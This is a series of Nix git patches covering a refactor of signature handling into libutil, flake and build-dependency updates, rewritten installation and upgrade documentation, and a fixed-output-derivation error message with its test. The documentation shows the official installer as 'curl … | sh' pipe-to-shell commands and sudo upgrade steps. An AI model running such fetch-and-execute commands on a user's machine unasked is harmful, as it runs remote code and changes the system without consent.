a/src/libutil/hash.hh b/src/libutil/hash.hh index 2fe9a53f5..f7e8eb265 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -5,7 +5,6 @@ #include "serialise.hh" #include "file-system.hh" - namespace nix { @@ -143,6 +142,11 @@ public: } static Hash dummy; + + /** + * @return a random hash with hash algorithm `algo` + */ + static Hash random(HashAlgorithm algo); }; /** diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 81efaafec..0fdebaf5c 100644 --- a/src/libutil/local.mk +++ b/src/libutil/local.mk @@ -4,14 +4,17 @@ libutil_NAME = libnixutil libutil_DIR := $(d) -libutil_SOURCES := $(wildcard $(d)/*.cc) +libutil_SOURCES := $(wildcard $(d)/*.cc $(d)/signature/*.cc) libutil_CXXFLAGS += -I src/libutil -libutil_LDFLAGS += -pthread $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context +libutil_LDFLAGS += -pthread $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context $(foreach i, $(wildcard $(d)/args/*.hh), \ $(eval $(call install-file-in, $(i), $(includedir)/nix/args, 0644))) +$(foreach i, $(wildcard $(d)/signature/*.hh), \ + $(eval $(call install-file-in, $(i), $(includedir)/nix/signature, 0644))) + ifeq ($(HAVE_LIBCPUID), 1) libutil_LDFLAGS += -lcpuid diff --git a/src/libstore/crypto.cc b/src/libutil/signature/local-keys.cc similarity index 64% rename from src/libstore/crypto.cc rename to src/libutil/signature/local-keys.cc index 1b705733c..858b036f5 100644 --- a/src/libstore/crypto.cc +++ b/src/libutil/signature/local-keys.cc @@ -1,13 +1,12 @@ -#include "crypto.hh" +#include "signature/local-keys.hh" + #include "file-system.hh" #include "util.hh" -#include "globals.hh" - #include namespace nix { -static std::pair split(std::string_view s) +BorrowedCryptoValue BorrowedCryptoValue::parse(std::string_view s) { size_t colon = s.find(':'); if (colon == std::string::npos || colon == 0) @@ -17,10 +16,10 @@ static std::pair split(std::string_view s) 
Key::Key(std::string_view s) { - auto ss = split(s); + auto ss = BorrowedCryptoValue::parse(s); - name = ss.first; - key = ss.second; + name = ss.name; + key = ss.payload; if (name == "" || key == "") throw Error("secret key is corrupt"); @@ -73,45 +72,34 @@ PublicKey::PublicKey(std::string_view s) throw Error("public key is not valid"); } -bool verifyDetached(const std::string & data, const std::string & sig, - const PublicKeys & publicKeys) +bool PublicKey::verifyDetached(std::string_view data, std::string_view sig) const { - auto ss = split(sig); + auto ss = BorrowedCryptoValue::parse(sig); - auto key = publicKeys.find(std::string(ss.first)); - if (key == publicKeys.end()) return false; + if (ss.name != std::string_view { name }) return false; - auto sig2 = base64Decode(ss.second); + return verifyDetachedAnon(data, ss.payload); +} + +bool PublicKey::verifyDetachedAnon(std::string_view data, std::string_view sig) const +{ + auto sig2 = base64Decode(sig); if (sig2.size() != crypto_sign_BYTES) throw Error("signature is not valid"); return crypto_sign_verify_detached((unsigned char *) sig2.data(), (unsigned char *) data.data(), data.size(), - (unsigned char *) key->second.key.data()) == 0; + (unsigned char *) key.data()) == 0; } -PublicKeys getDefaultPublicKeys() +bool verifyDetached(std::string_view data, std::string_view sig, const PublicKeys & publicKeys) { - PublicKeys publicKeys; + auto ss = BorrowedCryptoValue::parse(sig); - // FIXME: filter duplicates + auto key = publicKeys.find(std::string(ss.name)); + if (key == publicKeys.end()) return false; - for (auto s : settings.trustedPublicKeys.get()) { - PublicKey key(s); - publicKeys.emplace(key.name, key); - } - - for (auto secretKeyFile : settings.secretKeyFiles.get()) { - try { - SecretKey secretKey(readFile(secretKeyFile)); - publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); - } catch (SysError & e) { - /* Ignore unreadable key files. That's normal in a - multi-user installation. 
*/ - } - } - - return publicKeys; + return key->second.verifyDetachedAnon(data, ss.payload); } } diff --git a/src/libstore/crypto.hh b/src/libutil/signature/local-keys.hh similarity index 51% rename from src/libstore/crypto.hh rename to src/libutil/signature/local-keys.hh index 35216d470..4aafc1239 100644 --- a/src/libstore/crypto.hh +++ b/src/libutil/signature/local-keys.hh @@ -7,6 +7,25 @@ namespace nix { +/** + * Except where otherwise noted, Nix serializes keys and signatures in + * the form: + * + * ``` + * : + * ``` + */ +struct BorrowedCryptoValue { + std::string_view name; + std::string_view payload; + + /** + * This splits on the colon, the user can then separated decode the + * Base64 payload separately. + */ + static BorrowedCryptoValue parse(std::string_view); +}; + struct Key { std::string name; @@ -49,21 +68,36 @@ struct PublicKey : Key { PublicKey(std::string_view data); + /** + * @return true iff `sig` and this key's names match, and `sig` is a + * correct signature over `data` using the given public key. + */ + bool verifyDetached(std::string_view data, std::string_view sigs) const; + + /** + * @return true iff `sig` is a correct signature over `data` using the + * given public key. + * + * @param just the Base64 signature itself, not a colon-separated pair of a + * public key name and signature. + */ + bool verifyDetachedAnon(std::string_view data, std::string_view sigs) const; + private: PublicKey(std::string_view name, std::string && key) : Key(name, std::move(key)) { } friend struct SecretKey; }; +/** + * Map from key names to public keys + */ typedef std::map PublicKeys; /** * @return true iff ‘sig’ is a correct signature over ‘data’ using one * of the given public keys. 
*/ -bool verifyDetached(const std::string & data, const std::string & sig, - const PublicKeys & publicKeys); - -PublicKeys getDefaultPublicKeys(); +bool verifyDetached(std::string_view data, std::string_view sig, const PublicKeys & publicKeys); } diff --git a/src/libutil/signature/signer.cc b/src/libutil/signature/signer.cc new file mode 100644 index 000000000..0d26867b5 --- /dev/null +++ b/src/libutil/signature/signer.cc @@ -0,0 +1,23 @@ +#include "signature/signer.hh" +#include "error.hh" + +#include + +namespace nix { + +LocalSigner::LocalSigner(SecretKey && privateKey) + : privateKey(privateKey) + , publicKey(privateKey.toPublicKey()) +{ } + +std::string LocalSigner::signDetached(std::string_view s) const +{ + return privateKey.signDetached(s); +} + +const PublicKey & LocalSigner::getPublicKey() +{ + return publicKey; +} + +} diff --git a/src/libutil/signature/signer.hh b/src/libutil/signature/signer.hh new file mode 100644 index 000000000..e50170fe2 --- /dev/null +++ b/src/libutil/signature/signer.hh @@ -0,0 +1,61 @@ +#pragma once + +#include "types.hh" +#include "signature/local-keys.hh" + +#include +#include + +namespace nix { + +/** + * An abstract signer + * + * Derive from this class to implement a custom signature scheme. + * + * It is only necessary to implement signature of bytes and provide a + * public key. + */ +struct Signer +{ + virtual ~Signer() = default; + + /** + * Sign the given data, creating a (detached) signature. + * + * @param data data to be signed. + * + * @return the [detached + * signature](https://en.wikipedia.org/wiki/Detached_signature), + * i.e. just the signature itself without a copy of the signed data. + */ + virtual std::string signDetached(std::string_view data) const = 0; + + /** + * View the public key associated with this `Signer`. 
+ */ + virtual const PublicKey & getPublicKey() = 0; +}; + +using Signers = std::map; + +/** + * Local signer + * + * The private key is held in this machine's RAM + */ +struct LocalSigner : Signer +{ + LocalSigner(SecretKey && privateKey); + + std::string signDetached(std::string_view s) const override; + + const PublicKey & getPublicKey() override; + +private: + + SecretKey privateKey; + PublicKey publicKey; +}; + +} diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 5bb3f374b..7b4b1d031 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -7,6 +7,7 @@ #include #include +#include namespace nix { @@ -28,6 +29,9 @@ void initLibUtil() { } // This is not actually the main point of this check, but let's make sure anyway: assert(caught); + + if (sodium_init() == -1) + throw Error("could not initialise libsodium"); } ////////////////////////////////////////////////////////////////////// diff --git a/src/nix/sigs.cc b/src/nix/sigs.cc index a57a407e6..dfef44869 100644 --- a/src/nix/sigs.cc +++ b/src/nix/sigs.cc @@ -112,7 +112,7 @@ struct CmdSign : StorePathsCommand std::string description() override { - return "sign store paths"; + return "sign store paths with a local key"; } void run(ref store, StorePaths && storePaths) override @@ -121,6 +121,7 @@ struct CmdSign : StorePathsCommand throw UsageError("you must specify a secret key file using '-k'"); SecretKey secretKey(readFile(secretKeyFile)); + LocalSigner signer(std::move(secretKey)); size_t added{0}; @@ -129,7 +130,7 @@ struct CmdSign : StorePathsCommand auto info2(*info); info2.sigs.clear(); - info2.sign(*store, secretKey); + info2.sign(*store, signer); assert(!info2.sigs.empty()); if (!info->sigs.count(*info2.sigs.begin())) { diff --git a/src/nix/verify.cc b/src/nix/verify.cc index f0234f7be..2a0cbd19f 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -5,6 +5,7 @@ #include "thread-pool.hh" #include "references.hh" #include "signals.hh" +#include "keys.hh" #include From 
37ea1612c78b88884f7baecbb1bf81e65e571592 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 3 Jan 2024 19:38:22 -0500 Subject: [PATCH 194/654] flake: Go back to regular `nixos-23.05-small` MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Finally get off the ad-hoc staging commit! Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/36c4ac09e9bebcec1fa7b7539cddb0c9e837409c' (2023-11-30) → 'github:NixOS/nixpkgs/2c9c58e98243930f8cb70387934daa4bc8b00373' (2023-12-31) --- flake.lock | 8 ++++---- flake.nix | 12 +----------- tests/nixos/default.nix | 1 - 3 files changed, 5 insertions(+), 16 deletions(-) diff --git a/flake.lock b/flake.lock index db1a72c14..ae98d789a 100644 --- a/flake.lock +++ b/flake.lock @@ -34,16 +34,16 @@ }, "nixpkgs": { "locked": { - "lastModified": 1701355166, - "narHash": "sha256-4V7XMI0Gd+y0zsi++cEHd99u3GNL0xSTGRmiWKzGnUQ=", + "lastModified": 1704018918, + "narHash": "sha256-erjg/HrpC9liEfm7oLqb8GXCqsxaFwIIPqCsknW5aFY=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "36c4ac09e9bebcec1fa7b7539cddb0c9e837409c", + "rev": "2c9c58e98243930f8cb70387934daa4bc8b00373", "type": "github" }, "original": { "owner": "NixOS", - "ref": "staging-23.05", + "ref": "nixos-23.05-small", "repo": "nixpkgs", "type": "github" } diff --git a/flake.nix b/flake.nix index 9217de9af..e6a88af9f 100644 --- a/flake.nix +++ b/flake.nix @@ -1,17 +1,7 @@ { description = "The purely functional package manager"; - # TODO Go back to nixos-23.05-small once - # https://github.com/NixOS/nixpkgs/pull/271202 is merged. - # - # Also, do not grab arbitrary further staging commits. This PR was - # carefully made to be based on release-23.05 and just contain - # rebuild-causing changes to packages that Nix actually uses. - # - # Once this is updated to something containing - # https://github.com/NixOS/nixpkgs/pull/271423, don't forget - # to remove the `nix.checkAllErrors = false;` line in the tests. 
- inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; + inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 2645cac8e..4459aa664 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -10,7 +10,6 @@ let hostPkgs = nixpkgsFor.${system}.native; defaults = { nixpkgs.pkgs = nixpkgsFor.${system}.native; - nix.checkAllErrors = false; }; _module.args.nixpkgs = nixpkgs; }; From d8a2b06e2068b5209264dfc6d74d5cadf88b8684 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 4 Jan 2024 11:31:09 -0800 Subject: [PATCH 195/654] Remove `clang11Stdenv` Clang 11 doesn't have support for three-way-comparisons (<=>, "spaceship operator", "consistent comparisons") and is older than `clangStdenv`. `clangStdenv` is currently 12 on FreeBSD and Android and 16 on other platforms: https://github.com/NixOS/nixpkgs/blob/32e718f00c26c811be0062dd0777066f02406940/pkgs/top-level/all-packages.nix#L16629-L16644 Let's start by removing Clang 11 from our distribution. 
Next we can consider upgrading to Clang 17, which fully supports the spaceship operator: https://releases.llvm.org/17.0.1/tools/clang/docs/ReleaseNotes.html#what-s-new-in-clang-release --- doc/manual/src/contributing/hacking.md | 4 ++-- flake.nix | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index dce0422dc..9a03ac9b6 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -31,7 +31,7 @@ This shell also adds `./outputs/bin/nix` to your `$PATH` so you can run `nix` im To get a shell with one of the other [supported compilation environments](#compilation-environments): ```console -$ nix develop .#native-clang11StdenvPackages +$ nix develop .#native-clangStdenvPackages ``` > **Note** @@ -96,7 +96,7 @@ $ nix-shell To get a shell with one of the other [supported compilation environments](#compilation-environments): ```console -$ nix-shell --attr devShells.x86_64-linux.native-clang11StdenvPackages +$ nix-shell --attr devShells.x86_64-linux.native-clangStdenvPackages ``` > **Note** diff --git a/flake.nix b/flake.nix index e6a88af9f..32354a88f 100644 --- a/flake.nix +++ b/flake.nix @@ -52,7 +52,6 @@ stdenvs = [ "ccacheStdenv" - "clang11Stdenv" "clangStdenv" "gccStdenv" "libcxxStdenv" From 388c79d546db0a2e636aa56e4d4b9a5dfde50db5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 5 Jan 2024 15:15:25 +0100 Subject: [PATCH 196/654] Don't pull in libboost_regex We're not using and we don't want to pull in libicu (37 MiB). --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 56276ecc4..dfebdb0e4 100644 --- a/package.nix +++ b/package.nix @@ -248,7 +248,7 @@ in { # Copy libboost_context so we don't get all of Boost in our closure. 
# https://github.com/NixOS/nixpkgs/issues/45462 mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*} $out/lib rm -f $out/lib/*.a '' + lib.optionalString stdenv.hostPlatform.isLinux '' chmod u+w $out/lib/*.so.* From a4d33e816ef6c5baaed4eb65e826cd5aa75c0343 Mon Sep 17 00:00:00 2001 From: wiki-me <68199012+wiki-me@users.noreply.github.com> Date: Sat, 6 Jan 2024 20:01:10 +0200 Subject: [PATCH 197/654] Improve documentation around upgrading nix (#9679) * Improve documentation around upgrading nix, add replacing nix channel with new one Co-authored-by: Valentin Gagarin --- doc/manual/src/installation/upgrading.md | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index 6d09f54d8..d1b64b80b 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -1,5 +1,40 @@ # Upgrading Nix +> **Note** +> +> These upgrade instructions apply for regular Linux distributions where Nix was installed following the [installation instructions in this manual](./index.md). + +First, find the name of the current [channel](@docroot@/command-ref/nix-channel.md) through which Nix is distributed: + +```console +$ nix-channel --list +``` + +By default this should return an entry for Nixpkgs: + +```console +nixpkgs https://nixos.org/channels/nixpkgs-23.05 +``` + +Check which Nix version will be installed: + +```console +$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-23.11 --run "nix --version" +nix (Nix) 2.18.1 +``` + +> **Warning** +> +> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with `nix-build` or `nix-store --realise`, may change the database schema! 
+> Reverting to an older version of Nix may therefore require purging the store database before it can be used. + +Update the channel entry: + +```console +$ nix-channel --remove nixpkgs +$ nix-channel --add https://nixos.org/channels/nixpkgs-23.11 nixpkgs +``` + Multi-user Nix users on macOS can upgrade Nix by running: `sudo -i sh -c 'nix-channel --update && nix-env --install --attr nixpkgs.nix && From 8e865f3aba526394ca333efe7258bd8db0050fbb Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 6 Jan 2024 22:45:25 +0100 Subject: [PATCH 198/654] deduplicate installation instructions (#9507) * deduplicate installation instructions - reorder sections to present pinned installation more prominently - remove outdated notes on the macOS installer rework - update instructions to handle the installer tarball Co-authored-by: Travis A. Everett --- .../src/installation/installing-binary.md | 162 +++++++++--------- doc/manual/src/quick-start.md | 1 - 2 files changed, 77 insertions(+), 86 deletions(-) diff --git a/doc/manual/src/installation/installing-binary.md b/doc/manual/src/installation/installing-binary.md index ffabb250a..0dc989159 100644 --- a/doc/manual/src/installation/installing-binary.md +++ b/doc/manual/src/installation/installing-binary.md @@ -1,26 +1,60 @@ # Installing a Binary Distribution -The easiest way to install Nix is to run the following command: +To install the latest version Nix, run the following command: ```console $ curl -L https://nixos.org/nix/install | sh ``` -This will run the installer interactively (causing it to explain what -it is doing more explicitly), and perform the default "type" of install -for your platform: -- single-user on Linux -- multi-user on macOS +This performs the default type of installation for your platform: - > **Notes on read-only filesystem root in macOS 10.15 Catalina +** - > - > - It took some time to support this cleanly. You may see posts, - > examples, and tutorials using obsolete workarounds. 
- > - Supporting it cleanly made macOS installs too complex to qualify
- >   as single-user, so this type is no longer supported on macOS.
+- [Multi-user](#multi-user-installation):
+  - Linux with systemd and without SELinux
+  - macOS
+- [Single-user](#single-user-installation):
+  - Linux without systemd
+  - Linux with SELinux
 
-We recommend the multi-user install if it supports your platform and
-you can authenticate with `sudo`.
+We recommend the multi-user installation if it supports your platform and you can authenticate with `sudo`.
+
+The installer can be configured with various command line arguments and environment variables.
+To show available command line flags:
+
+```console
+$ curl -L https://nixos.org/nix/install | sh -s -- --help
+```
+
+To check what it does and how it can be customised further, [download and edit the second-stage installation script](#installing-from-a-binary-tarball).
+
+# Installing a pinned Nix version from a URL
+
+Version-specific installation URLs for all Nix versions since 1.11.16 can be found at [releases.nixos.org](https://releases.nixos.org/?prefix=nix/).
+The directory for each version contains the corresponding SHA-256 hash.
+
+All installation scripts are invoked the same way:
+
+```console
+$ export VERSION=2.19.2
+$ curl -L https://releases.nixos.org/nix/nix-$VERSION/install | sh
+```
+
+# Multi User Installation
+
+The multi-user Nix installation creates system users and a system service for the Nix daemon.
+
+Supported systems:
+
+- Linux running systemd, with SELinux disabled
+- macOS
+
+To explicitly instruct the installer to perform a multi-user installation on your system:
+
+```console
+$ curl -L https://nixos.org/nix/install | sh -s -- --daemon
+```
+
+You can run this under your usual user account or `root`.
+The script will invoke `sudo` as needed.
# Single User Installation @@ -30,60 +64,48 @@ To explicitly select a single-user installation on your system: $ curl -L https://nixos.org/nix/install | sh -s -- --no-daemon ``` -This will perform a single-user installation of Nix, meaning that `/nix` -is owned by the invoking user. You can run this under your usual user -account or root. The script will invoke `sudo` to create `/nix` -if it doesn’t already exist. If you don’t have `sudo`, you should -manually create `/nix` first as root, e.g.: +In a single-user installation, `/nix` is owned by the invoking user. +The script will invoke `sudo` to create `/nix` if it doesn’t already exist. +If you don’t have `sudo`, manually create `/nix` as `root`: ```console -$ mkdir /nix -$ chown alice /nix +$ su root +# mkdir /nix +# chown alice /nix ``` -The install script will modify the first writable file from amongst -`.bash_profile`, `.bash_login` and `.profile` to source -`~/.nix-profile/etc/profile.d/nix.sh`. You can set the -`NIX_INSTALLER_NO_MODIFY_PROFILE` environment variable before executing -the install script to disable this behaviour. +# Installing from a binary tarball -# Multi User Installation +You can also download a binary tarball that contains Nix and all its dependencies: +- Choose a [version](https://releases.nixos.org/?prefix=nix/) and [system type](../contributing/hacking.md#platforms) +- Download and unpack the tarball +- Run the installer -The multi-user Nix installation creates system users, and a system -service for the Nix daemon. - -**Supported Systems** -- Linux running systemd, with SELinux disabled -- macOS - -You can instruct the installer to perform a multi-user installation on -your system: - -```console -$ curl -L https://nixos.org/nix/install | sh -s -- --daemon -``` - -The multi-user installation of Nix will create build users between the -user IDs 30001 and 30032, and a group with the group ID 30000. You -can run this under your usual user account or root. 
The script
-will invoke `sudo` as needed.
-
-> **Note**
+> **Example**
 >
-> If you need Nix to use a different group ID or user ID set, you will
-> have to download the tarball manually and [edit the install
-> script](#installing-from-a-binary-tarball).
+> ```console
+> $ pushd $(mktemp -d)
+> $ export VERSION=2.19.2
+> $ export SYSTEM=x86_64-linux
+> $ curl -LO https://releases.nixos.org/nix/nix-$VERSION/nix-$VERSION-$SYSTEM.tar.xz
+> $ tar xf nix-$VERSION-$SYSTEM.tar.xz
+> $ cd nix-$VERSION-$SYSTEM
+> $ ./install
+> $ popd
+> ```
 
-The installer will modify `/etc/bashrc`, and `/etc/zshrc` if they exist.
-The installer will first back up these files with a `.backup-before-nix`
-extension. The installer will also create `/etc/profile.d/nix.sh`.
+The installer can be customised with the environment variables declared in the file named `install-multi-user`.
+
+## Native packages for Linux distributions
+
+The Nix community maintains installers for some Linux distributions in their [native packaging formats](https://nix-community.github.io/nix-installers/).
 
 # macOS Installation
+
 []{#sect-macos-installation-change-store-prefix}[]{#sect-macos-installation-encrypted-volume}[]{#sect-macos-installation-symlink}[]{#sect-macos-installation-recommended-notes}
 
-We believe we have ironed out how to cleanly support the read-only root
+We believe we have ironed out how to cleanly support the read-only root
 file system on modern macOS. New installs will do this automatically.
 
 This section previously detailed the situation, options, and trade-offs,
@@ -126,33 +148,3 @@ this to run the installer, but it may help if you run into trouble:
   boot process to avoid problems loading or restoring any programs that
   need access to your Nix store
 
-# Installing a pinned Nix version from a URL
-
-Version-specific installation URLs for all Nix versions
-since 1.11.16 can be found at [releases.nixos.org](https://releases.nixos.org/?prefix=nix/).
-The corresponding SHA-256 hash can be found in the directory for the given version. - -These install scripts can be used the same as usual: - -```console -$ curl -L https://releases.nixos.org/nix/nix-/install | sh -``` - -# Installing from a binary tarball - -You can also download a binary tarball that contains Nix and all its -dependencies. (This is what the install script at - does automatically.) You should unpack -it somewhere (e.g. in `/tmp`), and then run the script named `install` -inside the binary tarball: - -```console -$ cd /tmp -$ tar xfj nix-1.8-x86_64-darwin.tar.bz2 -$ cd nix-1.8-x86_64-darwin -$ ./install -``` - -If you need to edit the multi-user installation script to use different -group ID or a different user ID range, modify the variables set in the -file named `install-multi-user`. diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md index 04a0b7c96..75853ced7 100644 --- a/doc/manual/src/quick-start.md +++ b/doc/manual/src/quick-start.md @@ -10,7 +10,6 @@ For more in-depth information you are kindly referred to subsequent chapters. ``` The install script will use `sudo`, so make sure you have sufficient rights. - On Linux, `--daemon` can be omitted for a single-user install. For other installation methods, see the detailed [installation instructions](installation/index.md). From fe751fbde22aea0362993ab7212f96630443c307 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 6 Jan 2024 23:44:15 +0100 Subject: [PATCH 199/654] don't show channels in upgrade instructions channels make everything more stateful, and therefore more complicated and potentially confusing, but aren't needed for this task, so don't encourage their use. 
--- doc/manual/src/installation/upgrading.md | 49 ++++++++++-------------- 1 file changed, 20 insertions(+), 29 deletions(-) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index d1b64b80b..47618e2f5 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -2,48 +2,39 @@ > **Note** > -> These upgrade instructions apply for regular Linux distributions where Nix was installed following the [installation instructions in this manual](./index.md). +> These upgrade instructions apply where Nix was installed following the [installation instructions in this manual](./index.md). -First, find the name of the current [channel](@docroot@/command-ref/nix-channel.md) through which Nix is distributed: +Check which Nix version will be installed, for example from one of the [release channels](http://channels.nixos.org/) such as `nixpkgs-unstable`: ```console -$ nix-channel --list -``` - -By default this should return an entry for Nixpkgs: - -```console -nixpkgs https://nixos.org/channels/nixpkgs-23.05 -``` - -Check which Nix version will be installed: - -```console -$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-23.11 --run "nix --version" +$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-unstable --run "nix --version" nix (Nix) 2.18.1 ``` > **Warning** > -> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with `nix-build` or `nix-store --realise`, may change the database schema! +> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with [`nix-build`](@docroot@/command-ref/nix-build.md) or [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md), may change the database schema! > Reverting to an older version of Nix may therefore require purging the store database before it can be used. 
-Update the channel entry: +### Linux multi-user ```console -$ nix-channel --remove nixpkgs -$ nix-channel --add https://nixos.org/channels/nixpkgs-23.11 nixpkgs +$ sudo su +# nix-env --install --file '' --attr nix cacert -I nixpkgs=channel:nixpkgs-unstable +# systemctl daemon-reload +# systemctl restart nix-daemon ``` -Multi-user Nix users on macOS can upgrade Nix by running: `sudo -i sh -c -'nix-channel --update && -nix-env --install --attr nixpkgs.nix && -launchctl remove org.nixos.nix-daemon && -launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist'` +## macOS multi-user -Single-user installations of Nix should run this: `nix-channel --update; -nix-env --install --attr nixpkgs.nix nixpkgs.cacert` +```console +$ sudo nix-env --install --file '' --attr nix -I nixpkgs=channel:nixpkgs-unstable +$ sudo launchctl remove org.nixos.nix-daemon +$ sudo launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist +``` -Multi-user Nix users on Linux should run this with sudo: `nix-channel ---update; nix-env --install --attr nixpkgs.nix nixpkgs.cacert; systemctl -daemon-reload; systemctl restart nix-daemon` +## Single-user all platforms + +```console +$ nix-env --install --file '' --attr nix cacert -I nixpkgs=channel:nixpkgs-unstable +``` From eeb2f083c5646bd3a66344cff69be586fd89a450 Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sun, 24 Dec 2023 06:44:56 -0500 Subject: [PATCH 200/654] Improve error message for fixed-outputs with references. This codepath is possible, e.g. with a dockerTools.pullImage of an image with a Nix store. 
--- src/libstore/store-api.cc | 5 ++++- tests/functional/fixed.nix | 9 +++++++++ tests/functional/fixed.sh | 3 +++ 3 files changed, 16 insertions(+), 1 deletion(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c2516afb5..ad6e1cc0f 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -194,7 +194,10 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) { return makeStorePath(makeType(*this, "source", info.references), info.hash, name); } else { - assert(info.references.size() == 0); + if (!info.references.empty()) { + throw Error("fixed output derivation '%s' is not allowed to refer to other store paths.\nYou may need to use the 'unsafeDiscardReferences' derivation attribute, see the manual for more details.", + name); + } return makeStorePath("output:out", hashString(HashAlgorithm::SHA256, "fixed:out:" diff --git a/tests/functional/fixed.nix b/tests/functional/fixed.nix index babe71504..5bdf79333 100644 --- a/tests/functional/fixed.nix +++ b/tests/functional/fixed.nix @@ -48,6 +48,15 @@ rec { (f ./fixed.builder1.sh "flat" "md5" "ddd8be4b179a529afa5f2ffae4b9858") ]; + badReferences = mkDerivation rec { + name = "bad-hash"; + builder = script; + script = builtins.toFile "installer.sh" "echo $script >$out"; + outputHash = "1ixr6yd3297ciyp9im522dfxpqbkhcw0pylkb2aab915278fqaik"; + outputHashAlgo = "sha256"; + outputHashMode = "flat"; + }; + # Test for building two derivations in parallel that produce the # same output path because they're fixed-output derivations. parallelSame = [ diff --git a/tests/functional/fixed.sh b/tests/functional/fixed.sh index f1e1ce420..2405d059c 100644 --- a/tests/functional/fixed.sh +++ b/tests/functional/fixed.sh @@ -26,6 +26,9 @@ nix-build fixed.nix -A good2 --no-out-link echo 'testing reallyBad...' 
nix-instantiate fixed.nix -A reallyBad && fail "should fail"
 
+echo 'testing fixed with references...'
+expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths"
+
 # While we're at it, check attribute selection a bit more.
 echo 'testing attribute selection...'
 test $(nix-instantiate fixed.nix -A good.1 | wc -l) = 1

From faf87b51f76ba9794e65e1d17dc3debf759052cd Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 8 Jan 2024 14:14:36 +0100
Subject: [PATCH 201/654] Show why GC socket connection was refused

Co-authored-by: John Ericson 
---
 src/libstore/gc.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc
index b5b9e2049..38a9c708b 100644
--- a/src/libstore/gc.cc
+++ b/src/libstore/gc.cc
@@ -141,7 +141,7 @@ void LocalStore::addTempRoot(const StorePath & path)
                     /* The garbage collector may have exited or not
                        created the socket yet, so we need to restart. */
                     if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) {
-                        debug("GC socket connection refused");
+                        debug("GC socket connection refused: %s", e.msg());
                         fdRootsSocket->close();
                         goto restart;
                     }

From c4c636284e4b7b057788383068967910c5a31856 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 8 Jan 2024 10:17:28 -0500
Subject: [PATCH 202/654] Only test bug fix with new enough daemon

---
 tests/functional/fixed.sh | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/tests/functional/fixed.sh b/tests/functional/fixed.sh
index 2405d059c..d98d4cd15 100644
--- a/tests/functional/fixed.sh
+++ b/tests/functional/fixed.sh
@@ -26,8 +26,10 @@ nix-build fixed.nix -A good2 --no-out-link
 echo 'testing reallyBad...'
 nix-instantiate fixed.nix -A reallyBad && fail "should fail"
 
-echo 'testing fixed with references...'
-expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths"
+if isDaemonNewer "2.20pre20240108"; then
+    echo 'testing fixed with references...'
